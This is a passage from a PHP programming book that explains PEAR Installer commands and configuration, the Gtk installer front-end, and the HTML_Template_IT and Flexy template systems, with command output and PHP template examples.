    Starting to download HTTP_Request-1.2.1.tgz (12,021 bytes)
    ...done: 12,021 bytes
    downloading SOAP-0.8RC3.tgz ...
    Starting to download SOAP-0.8RC3.tgz (67,608 bytes)
    ...done: 67,608 bytes
    downloading XML_Serializer-0.9.2.tgz ...
    Starting to download XML_Serializer-0.9.2.tgz (12,340 bytes)
    ...done: 12,340 bytes
    downloading Net_URL-1.0.11.tgz ...
    Starting to download Net_URL-1.0.11.tgz (4,474 bytes)
    ...done: 4,474 bytes
    downloading Mail_Mime-1.2.1.tgz ...
    Starting to download Mail_Mime-1.2.1.tgz (15,268 bytes)
    ...done: 15,268 bytes
    downloading Net_DIME-0.3.tgz ...
    Starting to download Net_DIME-0.3.tgz (6,740 bytes)
    ...done: 6,740 bytes
    downloading XML_Util-0.5.2.tgz ...
    Starting to download XML_Util-0.5.2.tgz (6,540 bytes)
    ...done: 6,540 bytes
    install ok: Mail_Mime 1.2.1
    install ok: Net_DIME 0.3
    install ok: XML_Util 0.5.2
    install ok: Net_URL 1.0.11
    install ok: XML_Serializer 0.9.2
    install ok: HTTP_Request 1.2.1
    install ok: Cache 1.5.4
    install ok: SOAP 0.8RC3
    install ok: Services_Weather 1.2.2

10.6.2 pear list

The pear list command lists the contents of either your package registry or a single package. First, let's list the currently installed packages to see how the Date package is doing:

    $ pear list
    INSTALLED PACKAGES:
    ===================
    PACKAGE          VERSION      STATE
    Archive_Tar      1.1          stable
    Cache            1.4          stable
    Console_Getopt   1.2          stable
    Console_Table    1.0.1        stable
    DB               1.6.3        stable
    Date             1.4.2        stable
    HTTP_Request     1.2.1        stable
    Log              1.2          stable
    Mail             1.1.2        stable
    Mail_Mime        1.2.1        stable
    Net_DIME         0.3          beta
    Net_SMTP         1.2.6        stable
    Net_Socket       1.0.2        stable
    Net_URL          1.0.11       stable
    PEAR             1.3.1        stable
    PHPUnit2         2.0.0beta1   beta
    SOAP             0.8RC3       beta
    XML_Parser       1.1.0        stable
    XML_RPC          1.1.0        stable
    XML_Serializer   0.9.2        beta
    XML_Util         0.5.2        stable

To inspect the contents of a single installed package, use the list command with the package name:

    $ pear list Net_Socket
    INSTALLED FILES FOR NET_SOCKET
    ==============================
    TYPE   INSTALL PATH
    php    /usr/local/lib/php/Net/Socket.php

This package contains only php files. The PEAR package contains different types of files. The following example also illustrates how "data" files are installed with the package name as part of the file path:

    $ pear list PEAR
    INSTALLED FILES FOR PEAR
    ========================
    TYPE     INSTALL PATH
    data     /usr/local/lib/php/data/PEAR/package.dtd
    data     /usr/local/lib/php/data/PEAR/template.spec
    php      /usr/local/lib/php/PEAR.php
    php      /usr/local/lib/php/System.php
    php      /usr/local/lib/php/PEAR/Autoloader.php
    php      /usr/local/lib/php/PEAR/Command.php
    php      /usr/local/lib/php/PEAR/Command/Auth.php
    php      /usr/local/lib/php/PEAR/Command/Build.php
    php      /usr/local/lib/php/PEAR/Command/Common.php
    php      /usr/local/lib/php/PEAR/Command/Config.php
    php      /usr/local/lib/php/PEAR/Command/Install.php
    php      /usr/local/lib/php/PEAR/Command/Package.php
    php      /usr/local/lib/php/PEAR/Command/Registry.php
    php      /usr/local/lib/php/PEAR/Command/Remote.php
    php      /usr/local/lib/php/PEAR/Command/Mirror.php
    php      /usr/local/lib/php/PEAR/Common.php
    php      /usr/local/lib/php/PEAR/Config.php
    php      /usr/local/lib/php/PEAR/Dependency.php
    php      /usr/local/lib/php/PEAR/Downloader.php
    php      /usr/local/lib/php/PEAR/ErrorStack.php
    php      /usr/local/lib/php/PEAR/Frontend/CLI.php
    php      /usr/local/lib/php/PEAR/Builder.php
    php      /usr/local/lib/php/PEAR/Installer.php
    php      /usr/local/lib/php/PEAR/Packager.php
    php      /usr/local/lib/php/PEAR/Registry.php
    php      /usr/local/lib/php/PEAR/Remote.php
    php      /usr/local/lib/php/OS/Guess.php
    script   /usr/local/bin/pear
    php      /usr/local/lib/php/pearcmd.php

10.6.3 pear info

The pear info command displays information about an installed package, a package tarball, or a package definition (XML) file. This example shows the information about the XML-RPC package:

    $ pear info XML_RPC
    About XML_RPC-1.1.0
    ===================
    Provides          Classes:
    Package           XML_RPC
    Summary           PHP implementation of the XML-RPC protocol
    Description       This is a PEAR-ified version of Useful inc's
                      XML-RPC for PHP. It has support for HTTP
                      transport, proxies and authentication.
    Maintainers       Stig Sæther Bakken (lead)
    Version           1.1.0
    Release Date      2003-03-15
    Release License   PHP License
    Release State     stable
    Release Notes     - Added support for sequential arrays to
                        XML_RPC_encode() (mroch)
                      - Cleaned up new XML_RPC_encode() changes a bit
                        (mroch, pierre)
                      - Remove "require_once 'PEAR.php'", include only
                        when needed to raise an error
                      - Replace echo and error_log() with raiseError()
                        (mroch)
                      - Make all classes extend XML_RPC_Base, which
                        will handle common functions (mroch)
                      - be tolerant of junk after methodResponse
                        (Luca Mariano, mroch)
                      - Silent notice even in the error log (pierre)
                      - fix include of shared xml extension on win32
                        (pierre)
    Last Modified     2004-05-03

If you have downloaded a package file (.tgz file), you may also run pear info on it to display information about the contents without installing the package first; for example:

    $ pear info XML_RPC-1.1.0.tgz

You can even specify a full URL to a package you want to view:

    $ pear info http://www.example.com/packages/Foo_Bar-4.2.tgz

See also the remote-info command.

10.6.4 pear list-all

While pear list displays all the packages installed on your system, pear list-all displays an alphabetically sorted list of all packages with the latest stable version, and which version you have installed, if any. The full output of this command is long because it lists every package that has a stable release.

    ALL PACKAGES:
    =============
    PACKAGE           LATEST   LOCAL
    APC               2.0.3
    Cache             1.5.4    1.4
    Cache_Lite        1.3
    apd               0.4p2
    ...truncated...
    XML_Transformer   1.0.1
    XML_Tree          1.1
    XML_Util          0.5.2    0.5.2
    PHPUnit2                   2.0.0beta1
    Net_DIME                   0.3
    XML_Serializer             0.9.2
    SOAP                       0.8RC3

10.6.5 pear list-upgrades

The pear list-upgrades command compares the version you have installed with the newest version available in the release state you have configured (see the preferred_state configuration parameter). Here's an example:

    $ pear list-upgrades
    AVAILABLE UPGRADES (STABLE):
    ============================
    PACKAGE   LOCAL            REMOTE           SIZE
    Cache     1.4 (stable)     1.5.4 (stable)   30kB
    DB        1.6.3 (stable)   1.6.4 (stable)   90kB
    Log       1.2 (stable)     1.8.4 (stable)   29kB
    Mail      1.1.2 (stable)   1.1.3 (stable)   13.2kB

The version listed in the REMOTE column is not the one you have installed, but the one you will upgrade to if you use the upgrade command.

10.6.6 pear upgrade

The pear upgrade command replaces one or more installed packages with a newer release, if a newer release can be found. As with many other commands taking a package argument, you may refer to the package just by name, the URL or name of a tarball, or the URL or name of a package description (XML) file. This section only demonstrates specifying the package by name because that is by far the most common usage.

In the list-upgrades example, you saw a few packages where newer releases were available. Upgrade the Log package:

    $ pear upgrade Log
    downloading Log-1.8.4.tgz ...
    Starting to download Log-1.8.4.tgz (29,453 bytes)
    ...done: 29,453 bytes
    Optional dependencies:
    'sqlite' PHP extension is recommended to utilize some features
    upgrade ok: Log 1.8.4

The upgrade command has the same options as the install command, with the exception that the -s / --soft option is missing. The options are listed here; refer to the install command, shown previously, for a more detailed description.

    $ pear help upgrade
    pear upgrade [options] <package> ...
    Upgrades one or more PEAR packages. See documentation for the
    "install" command for ways to specify a package.

    When upgrading, your package will be updated if the provided new
    package has a higher version number (use the -f option if you need
    to upgrade anyway).

    More than one package may be specified at once.

    Options:
    -f, --force
        overwrite newer installed packages
    -n, --nodeps
        ignore dependencies, upgrade anyway
    -r, --register-only
        do not install files, only register the package as upgraded
    -B, --nobuild
        don't build C extensions
    -Z, --nocompress
        request uncompressed files when downloading
    -R DIR, --installroot=DIR
        root directory used when installing files (ala PHP's INSTALL_ROOT)
    --ignore-errors
        force install even if there were errors
    -a, --alldeps
        install all required and optional dependencies
    -o, --onlyreqdeps
        install all required dependencies

10.6.7 pear upgrade-all

For your convenience, the upgrade-all command provides a combination of the list-upgrades and upgrade commands, upgrading every package that has a newer release available. The command-line options available are

    -n, --nodeps
        ignore dependencies, upgrade anyway
    -r, --register-only
        do not install files, only register the package as upgraded
    -B, --nobuild
        don't build C extensions
    -Z, --nocompress
        request uncompressed files when downloading
    -R DIR, --installroot=DIR
        root directory used when installing files (ala PHP's INSTALL_ROOT)
    --ignore-errors
        force install even if there were errors

See the install command for a description of each of these options.

If you have followed the examples in this chapter, you have still not upgraded three out of the four packages that list-upgrades reported as having newer releases. Upgrade them all at once like this:

    $ pear upgrade-all
    Will upgrade cache
    Will upgrade db
    Will upgrade mail
    downloading Cache-1.5.4.tgz ...
    Starting to download Cache-1.5.4.tgz (30,690 bytes)
    ...done: 30,690 bytes
    downloading DB-1.6.4.tgz ...
    Starting to download DB-1.6.4.tgz (91,722 bytes)
    ...done: 91,722 bytes
    downloading Mail-1.1.3.tgz ...
    Starting to download Mail-1.1.3.tgz (13,415 bytes)
    ...done: 13,415 bytes
    upgrade-all ok: Mail 1.1.3
    upgrade-all ok: DB 1.6.4
    upgrade-all ok: Cache 1.5.4
    Optional dependencies:
    'sqlite' PHP extension is recommended to utilize some features
    upgrade-all ok: Log 1.8.4
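The rule quoted in the upgrade help text (a package is updated only if the new package has a higher version number) can be sketched in a few lines of shell. This is a simplified illustration, not how the installer itself compares versions: version_gt is a hypothetical helper that understands only dotted numeric versions such as 1.8.4, so release suffixes such as RC3 or beta1 are out of scope. The version pairs are the ones from the list-upgrades example.

```shell
#!/bin/sh
# Hypothetical helper: succeeds when dotted numeric version $1 is higher
# than $2. Simplification: digits and dots only; suffixes such as "RC3"
# are not handled.
version_gt() {
    a=$1
    b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        # Take the leading component of each version; a missing one counts as 0.
        x=${a%%.*}
        y=${b%%.*}
        x=${x:-0}
        y=${y:-0}
        # Drop the component just read.
        case "$a" in *.*) a=${a#*.} ;; *) a= ;; esac
        case "$b" in *.*) b=${b#*.} ;; *) b= ;; esac
        if [ "$x" -gt "$y" ]; then return 0; fi
        if [ "$x" -lt "$y" ]; then return 1; fi
    done
    return 1   # the versions are equal
}

# Installed and newest versions, taken from the list-upgrades example.
while read -r package installed newest; do
    if version_gt "$newest" "$installed"; then
        echo "$package: $installed -> $newest"
    else
        echo "$package: up to date"
    fi
done <<EOF
Cache 1.4 1.5.4
DB 1.6.3 1.6.4
Log 1.2 1.8.4
Mail 1.1.2 1.1.3
EOF
```

Comparing component by component, rather than as strings or decimals, is what makes 1.8.4 higher than 1.2 and 1.0.11 higher than 1.0.2.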

10.6.8 pear uninstall

To delete a package, you must uninstall it. Here's an example:

    $ pear uninstall Cache
    Warning: Package 'services_weather' optionally depends on 'Cache'
    uninstall ok: Cache

The uninstall command has the following options:

    pear uninstall [options] <package> ...
    Uninstalls one or more PEAR packages. More than one package may be
    specified at once.

    Options:
    -n, --nodeps
        ignore dependencies, uninstall anyway
    -r, --register-only
        do not remove files, only register the packages as not installed
    -R DIR, --installroot=DIR
        root directory used when installing files (ala PHP's INSTALL_ROOT)
    --ignore-errors
        force install even if there were errors

These options all correspond to the same options to the install command.

10.6.9 pear search

If you want to install a package but don't remember what it was called, or just wonder if there is a package that does X, you can search for it with the pear search command, which does a substring search in package names. Here's an example:

    $ pear search xml
    MATCHED PACKAGES:
    =================
    PACKAGE           LATEST   LOCAL
    XML_Beautifier    1.1              Class to format XML documents.
    XML_CSSML         1.1              The PEAR::XML_CSSML package provides
                                       methods for creating cascading style
                                       sheets (CSS) from an XML standard
                                       called CSSML.
    XML_fo2pdf        0.98             Converts a xsl-fo file to pdf/ps/pcl
                                       text/etc with the help of apache-fop
    XML_HTMLSax       2.1.2            A SAX based parser for HTML and other
                                       badly formed XML documents
    XML_image2svg     0.1              Image to SVG conversion
    XML_NITF          1.0.0            Parse NITF documents.
    XML_Parser        1.1.0    1.1.0   XML parsing class based on PHP's
                                       bundled expat
    XML_RSS           0.9.2            RSS parser
    XML_SVG           0.0.3            XML_SVG API
    XML_Transformer   1.0.1            XML Transformations in PHP
    XML_Tree          1.1              Represent XML data in a tree structure
    XML_Util          0.5.2    0.5.2   XML utility class.
    XML_RPC           1.1.0    1.1.0   PHP implementation of the XML-RPC
                                       protocol

The output is displayed in four columns: package name, latest version available online, locally installed version (or blank if you do not have that package installed), and a short description.

10.6.10 pear remote-list

This command displays a list of all packages and stable releases that are available in the package repository:

    $ pear remote-list
    AVAILABLE PACKAGES:
    ===================
    PACKAGE            VERSION
    APC                2.0.3
    apd                0.4p2
    Archive_Tar        1.1
    Auth               1.2.3
    Auth_HTTP          2.0
    Auth_PrefManager   1.1.2
    Auth_RADIUS        1.0.4
    Auth_SASL          1.0.1
    Benchmark          1.2.1
    bz2                1.0
    Cache              1.5.4
    ...

The difference from list-all is that remote-list only shows the last available version, while list-all also shows which releases you have installed.

This command obeys your preferred_state configuration setting, which defaults to stable. All the packages and releases in the output of the previous example are tagged as stable.

You may temporarily set preferred_state for just one command. The following example shows all packages that are of alpha quality or better:

    $ pear -d preferred_state=alpha remote-list
    AVAILABLE PACKAGES:
    ===================
    PACKAGE            VERSION
    APC                2.0.3
    apd                0.4p2
    Archive_Tar        1.1
    Archive_Zip        0
    Auth               1.2.3
    Auth_Enterprise    0
    Auth_HTTP          2.1.0RC2
    Auth_PrefManager   1.1.2
    Auth_RADIUS        1.0.4
    Auth_SASL          1.0.1
    bcompiler          0.5
    Benchmark          1.2.1
    bz2                1.0
    ...

As you can see, some new packages showed up: Archive_Zip and Auth_Enterprise (which did not have any releases at all at this point), and bcompiler 0.5.

10.6.11 pear remote-info

To display detailed information about a package you have not installed, use the pear remote-info command.

    $ pear remote-info apc
    PACKAGE DETAILS:
    ================
    Latest        2.0
    Installed     - no -
    Package       APC
    License       PHP
    Category      Caching
    Summary       Alternative PHP Cache
    Description   APC is the Alternative PHP Cache. It was conceived
                  of to provide a free, open, and robust framework
                  for caching and optimizing PHP intermediate code.

The package description shown by the remote-info command is taken from the newest release of the package.

10.6.12 pear download

The pear install command does not store the package file it downloads anywhere. If all you want is the package tarball (for installing later or something else), you can use the pear download command:

    $ pear download DB
    File DB-1.3.tgz downloaded (59332 bytes)

By default, you will receive the latest release matching your preferred_state configuration parameter. If you want to download a specific release, give the full file name instead:

    $ pear download DB-1.2.tgz
    File DB-1.2.tgz downloaded (58090 bytes)

Tip: If you don't have the zlib PHP extension built in, use the -Z or --nocompress option to download .tar files.

10.6.13 pear config-get

As you have already seen, the pear config-get command is used to display a configuration parameter:

    $ pear config-get php_dir
    php_dir=/usr/share/pear

If you do not specify a layer, the value is read from the first layer that defines it (in the order user, system, default). You may also specify the configuration layer from which you want to get the value:

    $ pear config-get http_proxy system
    system.http_proxy=proxy.example.com:3128

10.6.14 pear config-set

The pear config-set command changes a configuration parameter:

    $ pear config-set preferred_state beta

By default, the change is performed in the user configuration layer. You may specify the configuration layer with an additional parameter:

    $ pear config-set preferred_state beta system

(You need write access to the system configuration file for this to have any effect.)

10.6.15 pear config-show

The pear config-show command is used to display all configuration settings, treating layers just like the config-get command.

    $ pear config-show
    CONFIGURATION:
    ==============
    PEAR executables directory       bin_dir          /usr/local/bin
    PEAR documentation directory     doc_dir          /usr/local/lib/php/doc
    PHP extension directory          ext_dir          /usr/local/lib/php/extensions/no-debug-non-zts-20040316
    PEAR directory                   php_dir          /usr/local/lib/php
    PEAR Installer cache directory   cache_dir        /tmp/pear/cache
    PEAR data directory              data_dir         /usr/local/lib/php/data
    PHP CLI/CGI binary               php_bin          /usr/local/bin/php
    PEAR test directory              test_dir         /usr/local/lib/php/test
    Cache TimeToLive                 cache_ttl        3600
    Preferred Package State          preferred_state  stable
    Unix file mask                   umask            22
    Debug Log Level                  verbose          1
    HTTP Proxy Server Address        http_proxy
    PEAR server                      master_server    pear.php.net
    PEAR password (for maintainers)  password
    Signature Handling Program       sig_bin          /usr/bin/gpg
    Signature Key Directory          sig_keydir       /usr/local/etc/pearkeys
    Signature Key Id                 sig_keyid
    Package Signature Type           sig_type         gpg
    PEAR username (for maintainers)  username

Tip: By adding an extra parameter (user or system), you can view the contents of a specific configuration layer.

10.6.16 Shortcuts

Every command in the PEAR Installer may specify a command-line shortcut, just to save people from typing. Type pear help shortcuts to see them:

    $ pear help shortcuts
    Shortcuts:
        li     login
        lo     logout
        b      build
        csh    config-show
        cg     config-get
        cs     config-set
        ch     config-help
        i      install
        up     upgrade
        ua     upgrade-all
        un     uninstall
        bun    bundle
        p      package
        pv     package-validate
        cd     cvsdiff
        ct     cvstag
        rt     run-tests
        pd     package-dependencies
        si     sign
        rpm    makerpm
        l      list
        st     shell-test
        in     info
        ri     remote-info
        lu     list-upgrades
        rl     remote-list
        sp     search
        la     list-all
        d      download
        cc     clear-cache
        da     download-all

Instead of pear config-set foo bar, you may type pear cs foo bar, or pear pd instead of pear package-dependencies.
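The layer lookup described for pear config-get (user first, then system, then default) can be pictured with a small sketch. This is not the PEAR Installer's own code: the config_get() function and the contents of the $layers array are hypothetical, made up only to show the order in which layers are consulted.

```php
<?php
// Illustrative only: config_get() and the sample layer data are assumptions,
// not part of the PEAR Installer.
function config_get($layers, $key, $layer = null)
{
    if ($layer !== null) {
        // An explicit layer was requested: look only there.
        return isset($layers[$layer][$key]) ? $layers[$layer][$key] : null;
    }
    // Otherwise, take the value from the first layer that defines the key.
    foreach (array('user', 'system', 'default') as $name) {
        if (isset($layers[$name][$key])) {
            return $layers[$name][$key];
        }
    }
    return null;
}

$layers = array(
    'user'    => array('preferred_state' => 'beta'),
    'system'  => array('http_proxy' => 'proxy.example.com:3128'),
    'default' => array('preferred_state' => 'stable',
                       'php_dir' => '/usr/share/pear'),
);

echo config_get($layers, 'preferred_state'), "\n";      // found in the user layer
echo config_get($layers, 'php_dir'), "\n";              // falls through to default
echo config_get($layers, 'http_proxy', 'system'), "\n"; // explicit layer
```

With this sample data, the user layer's beta overrides the default stable, which mirrors what happens after running pear config-set preferred_state beta without naming a layer.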

10.7 Installer Front-Ends

The PEAR Installer provides a front-end (user interface) API that is used to implement different types of user interfaces.

10.7.1 CLI (Command Line Interface) Installer

The PEAR Command Line Interface installer runs in a terminal shell with human-readable text output. You have seen examples of this front-end in the previous sections.

10.7.2 Gtk Installer

Earlier, you learned that the PEAR Installer separates the user interface code into “front-ends.” So far, this chapter has presented only the CLI front-end; in this section, you glance at the Gtk (GNOME) front-end.

Gtk is a graphical user interface toolkit that is common among Linux users. A Windows port exists as well, but this section focuses on the UNIX/Linux environment.

The PEAR Gtk front-end requires that you have php-gtk installed. For help installing php-gtk, refer to http://gtk.php.net/.

After you set up php-gtk, install the PEAR_Frontend_Gtk package:

    $ pear install PEAR_Frontend_Gtk
    downloading PEAR_Frontend_Gtk-0.3.tgz ...
    ...done: 70,008 bytes
    install ok: PEAR_Frontend_Gtk 0.3

10.7.2.1 Using the Gtk Installer

Now, fire up the Gtk installer with this command:

    $ pear -G

The result should look like what is shown in Figure 10.3.

Fig. 10.3 PEAR Gtk Installer Startup Screen.

On the left-hand side, you can navigate between the different parts of the installer. The one that is currently being displayed is the PEAR Installer. The package list pane to the right has four columns: Package, Installed, New, and Summary. This is similar to the output of the pear list-all command, with the addition of the Summary field. Also, notice how packages are grouped into category folders that you may collapse and expand.

The Installed column says which version of the package you have already installed. If the package is not installed, this field is blank. If it is installed, the field shows the version of the release you have, along with an outline of a trashcan that you can click to schedule an uninstall.

The New field is filled in if a newer release is available or you don’t have the package, along with a checkbox that you can click to schedule the package for install or upgrade.

But first, try clicking the Summary field for a package, as shown in Figure 10.4.

Fig. 10.4 Summary field for package.

This splits the package area in two and displays some information about the package you just selected. Click the X to make it go away.

Now, let’s install Cache_Lite by clicking the checkbox next to the version number in the New column, and then click Download and Install >> in the lower-right corner, as shown in Figure 10.5.

Fig. 10.5 Cache_Lite package installed.

That’s all there is to it. It is worth noting that the Gtk front-end to the PEAR Installer uses the same code to perform installation and so on; it just provides another user interface.

Let’s take a look at the Configuration part (click Configuration in the Navigation sidebar), as shown in Figure 10.6.

Fig. 10.6 Configuring PEAR.

Just flip through the different configuration category tabs and take a look; the configuration parameters you see listed here are exactly the same ones that you learned about in the CLI version of the installer, just presented in a nicer way.

10.8 Summary

This chapter’s goal was to introduce the PEAR infrastructure and show you how to install packages for your own use. In the following chapter, you learn about some important packages and how to use them in your code.


CHAPTER 11
Important PEAR Packages

11.1 Introduction

In this chapter, you see examples of some popular PEAR packages. This book does not have room for examples of every PEAR package, but this should at least give you an introduction.

11.2 Database Queries

See Chapter 6, “Databases with PHP 5,” for an introduction to PEAR DB.

11.3 Template Systems

Template systems are PHP components that let you separate application logic from display logic, and offer a simpler template format than PHP itself.

It is ironic that PHP, which essentially started out as a template language, is used to implement template systems. But there are good reasons for doing this besides the code/presentation separation, such as giving web designers a simpler markup format they can use in their page authoring tools, and giving developers greater control over page generation. For example, a template system can automatically translate text snippets to another language, or fill in a form with default values.

A vast number of template systems are available for PHP. Along with database abstraction layers, template systems are among the PHP components that arouse the strongest feelings, and the least willingness to compromise, in developers. As a result, many people have written their own template system, resulting in a wonderful diversity and lack of standardization.

11.3.1 Template Terminology

Before you dive into the various template systems, you may want to familiarize yourself with the template lingo (see Table 11.1).

Table 11.1 Template Glossary

    Word              Meaning
    Template          The output blueprint; contains placeholders and blocks.
    Compile           Transforming a template to PHP code.
    Placeholder       Delimited string that is replaced during execution.
    Block or Section  Part of a template that may be repeated with
                      different data.

11.3.2 HTML_Template_IT

The first PEAR template system you will familiarize yourself with is HTML_Template_IT, or just IT. This is the most popular PEAR template package, but it is also the slowest because it parses templates on every request and does not compile them into PHP code.

Tip: The HTML_Template_Sigma package provides an API that is compatible with HTML_Template_IT, but compiles templates into PHP code.

11.3.2.1 Placeholder Syntax

IT uses curly braces as placeholder delimiters, like this:

    {PageTitle}

This is the most common placeholder syntax, so chances are a template using only placeholders will actually work with different template packages.

11.3.2.2 Example: Basic IT Template

This example is “Hello World” with HTML_Template_IT:

    <?php
    require_once 'HTML/Template/IT.php';

    // The template directory; './templates' is an assumed location.
    $tpl = new HTML_Template_IT('./templates');
    $tpl->loadTemplateFile('hello.tpl');
    $tpl->setVariable('title', 'Hello, World!');
    $tpl->setVariable('body', 'This is a test of HTML_Template_IT!');
    $tpl->show();

First, you create an HTML_Template_IT object, passing the template directory as a parameter. Next, the template file is loaded and some variables are set. The variable names correspond to placeholders in the template file, so the {title} template placeholder is replaced with the value of the "title" variable. Finally, the show() method does all the substitutions and displays the template output.
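To make the idea of placeholder substitution concrete, here is a minimal sketch that does not use HTML_Template_IT at all. The render_placeholders() function is a hypothetical helper written for this illustration; it only shows the principle of replacing {name} markers with values, not how the package is implemented.

```php
<?php
// Illustrative only: render_placeholders() is a made-up helper, not part
// of HTML_Template_IT.
function render_placeholders($template, $vars)
{
    // Build a map such as '{title}' => 'Hello, World!'.
    $map = array();
    foreach ($vars as $name => $value) {
        $map['{' . $name . '}'] = $value;
    }
    // strtr() replaces every occurrence of each key in a single pass.
    return strtr($template, $map);
}

$template = "<h1>{title}</h1>\n<p>{body}</p>\n";

echo render_placeholders($template, array(
    'title' => 'Hello, World!',
    'body'  => 'This is a test.',
));
```

In this sketch, placeholders without a matching value are left in the output untouched; a real template package may handle that case differently.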

The hello.tpl template file used in the “Hello World” example looks like this:

    <html>
     <head>
      <title>{title}</title>
     </head>
     <body>
      <h1>{title}</h1>
      <p>{body}</p>
     </body>
    </html>

Figure 11.1 shows the result.

Fig. 11.1 Basic IT template output.

11.3.2.3 Block Syntax

For blocks, IT uses HTML begin/end comments like this:

    <!-- BEGIN blockname -->
    <li>{listitem}</li>
    <!-- END blockname -->

Blocks may be nested, but it is important that you start processing at the innermost block and work your way out.

11.3.2.4 Example: IT With Blocks

First, install HTML_Template_IT:

    $ pear install HTML_Template_IT
    downloading HTML_Template_IT-1.1.tgz ...
    Starting to download HTML_Template_IT-1.1.tgz (18,563 bytes)
    ...done: 18,563 bytes
    install ok: HTML_Template_IT 1.1

This example uses blocks to implement a simple foreach-like loop in the template:

    <?php
    require_once 'HTML/Template/IT.php';

    $list_items = array(
        'Computer Science',
        'Nuclear Physics',
        'Rocket Science',
        );

    // The template directory; './templates' is an assumed location.
    $tpl = new HTML_Template_IT('./templates');
    $tpl->loadTemplateFile('it_list.tpl');
    $tpl->setVariable('title', 'IT List Example');
    foreach ($list_items as $item) {
        $tpl->setCurrentBlock("listentry");
        $tpl->setVariable("entry_text", $item);
        $tpl->parseCurrentBlock();
    }
    $tpl->show();

This example sets up the IT object like the previous one, but calls setCurrentBlock() to specify which block the following setVariable() call applies to. When parseCurrentBlock() is called, the block is parsed, placeholders are substituted, and the result is buffered until the template is displayed.

This is how the block template appears:

    <html>
     <head>
      <title>{title}</title>
     </head>
     <body>
      <h1>{title}</h1>
      <ul>
    <!-- BEGIN listentry -->
       <li>{entry_text}</li>
    <!-- END listentry -->
      </ul>
      (End of list)
     </body>
    </html>

Figure 11.2 shows the results.
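The block mechanism can be sketched in a few lines of plain PHP. The render_block() function below is a hypothetical helper, not the HTML_Template_IT API; it assumes a single, non-nested block and only illustrates the idea of parsing the block body once per data item and buffering the results.

```php
<?php
// Illustrative only: render_block() is a made-up helper and handles just
// one non-nested block; it is not how HTML_Template_IT is implemented.
function render_block($template, $block, $placeholder, $items)
{
    $begin = '<!-- BEGIN ' . $block . ' -->';
    $end   = '<!-- END ' . $block . ' -->';

    $start = strpos($template, $begin);
    $stop  = strpos($template, $end);
    if ($start === false || $stop === false || $stop < $start) {
        return $template; // block not found: leave the template unchanged
    }

    // The text between the two comments is the repeatable block body.
    $bodyStart = $start + strlen($begin);
    $body = substr($template, $bodyStart, $stop - $bodyStart);

    // Parse the body once per item and buffer the results.
    $buffer = '';
    foreach ($items as $item) {
        $buffer .= str_replace('{' . $placeholder . '}', $item, $body);
    }

    // Splice the buffered output in place of the whole block.
    return substr($template, 0, $start)
         . $buffer
         . substr($template, $stop + strlen($end));
}

$template = '<ul><!-- BEGIN listentry --><li>{entry_text}</li>'
          . '<!-- END listentry --></ul>';

echo render_block($template, 'listentry', 'entry_text',
    array('Computer Science', 'Nuclear Physics', 'Rocket Science'));
```

Each loop iteration here plays the role of one setCurrentBlock(), setVariable(), parseCurrentBlock() round in the IT example, with $buffer standing in for the output that IT holds until the template is displayed.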

Fig. 11.2 IT with blocks output.

Finally, IT lets you include other template files anywhere in your template, like this:

    <!-- INCLUDE otherfile.tpl -->

In this block example, you could substitute the block contents with just an include tag, and HTML_Template_IT would include that file for every iteration of the block. By using includes carefully, you can structure your templates so you obtain reusable sub-templates.

11.3.3 HTML_Template_Flexy

The next template package is HTML_Template_Flexy, or just Flexy. Even though pure placeholder templates written for IT will work out-of-the-box with Flexy, these two template packages are very different.

First, Flexy operates on objects and object member variables, whereas IT works with variables that are stored in associative arrays. This is not a big difference in itself, but Flexy has the advantage that you can give it any object, of any class, and your template can access its public member variables.

11.3.3.1 Example: Basic Flexy Template

Here is a “Hello, World!” example with Flexy:

    <?php
    require_once 'HTML/Template/Flexy.php';

    $tpldir = 'templates';
    $tpl = new HTML_Template_Flexy(array(
        'templateDir' => $tpldir,
        'compileDir' => 'compiled',
        ));
    $tpl->compile('hello.tpl');
    $view = new StdClass;
    $view->title = 'Hello, World!';
    $view->body = 'This is a test of HTML_Template_Flexy';
    $tpl->outputObject($view);

A little more code is required to set up Flexy because you need to specify both the template directory and compile directory. The compile directory is where the compiled template files are stored. This directory must be writable by the web server. By default, the compile directory is relative to the template directory.

Next, the hello.tpl template is compiled. You should notice that this is the same template as in the first IT example; this works because the template contains only two simple placeholders.

Compilation is time-consuming, but is done only once or whenever the template file changes. As a result, the first time you load this page, it takes noticeably longer. Subsequent page loads are much faster.

When a template is compiled, the compiled version is placed in compileDir. In the previous example, this is the “compiled” directory relative to the current directory. This directory must be writable by the web server, because templates will be compiled on demand by PHP when a user hits the page.

Finally, an object holding view data is created and passed to the outputObject() method, which executes the template and prints the output.

11.3.3.2 Example: Flexy with Blocks

This example corresponds to the “IT with Blocks” example:

    <?php
    require_once 'HTML/Template/Flexy.php';

    $tpl = new HTML_Template_Flexy(array(
        'templateDir' => 'templates',
        'compileDir' => 'compiled',
        ));
    $tpl->compile('flexy_list.tpl');
    $view = new StdClass;
    $view->title = 'Flexy Foreach Example';
    $view->list_entries = array(
        'Computer Science',
        'Nuclear Physics',
        'Rocket Science',
        );
    $tpl->outputObject($view);

This time, the template file is different because it is using more than just placeholders and is no longer compatible with IT:

    <html>
     <head>
      <title>{title}</title>
     </head>
     <body>
      <h1>{title}</h1>
      <ul>
       {foreach:list_entries,entry_text}
       <li>{entry_text}</li>
       {end:}
      </ul>
      (End of list)
     </body>
    </html>

If you compare the PHP code in this example with the corresponding IT example, you see that all the hassle of parsing blocks is gone. This is because the template is compiled; instead of dealing with flow-control on its own, Flexy leaves this to PHP’s executor. Look at the PHP file generated by the Flexy compiler:

    <html>
     <head>
      <title><?php echo htmlspecialchars($t->title);?></title>
     </head>
     <body>
      <h1><?php echo htmlspecialchars($t->title);?></h1>
      <ul>
       <?php if (is_array($t->list_entries) || is_object($t->list_entries)) foreach($t->list_entries as $entry_text) {?>
       <li><?php echo htmlspecialchars($entry_text);?></li>
       <?php }?>
      </ul>
      (End of list)
     </body>
    </html>
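The step of turning a placeholder into PHP code can be illustrated with a deliberately tiny sketch. The compile_placeholders() function is hypothetical and is not the Flexy compiler; it handles only plain top-level {name} placeholders (no {foreach:}, no modifiers, no loop variables) and produces the same kind of echo statement seen in the generated file above.

```php
<?php
// Illustrative only: compile_placeholders() is a made-up helper, far
// simpler than the real Flexy compiler.
function compile_placeholders($template)
{
    // Rewrite {name} into a PHP echo of the matching member of the view
    // object $t, HTML-encoded with htmlspecialchars().
    return preg_replace(
        '/\{([A-Za-z_][A-Za-z0-9_]*)\}/',
        '<?php echo htmlspecialchars($t->$1);?>',
        $template
    );
}

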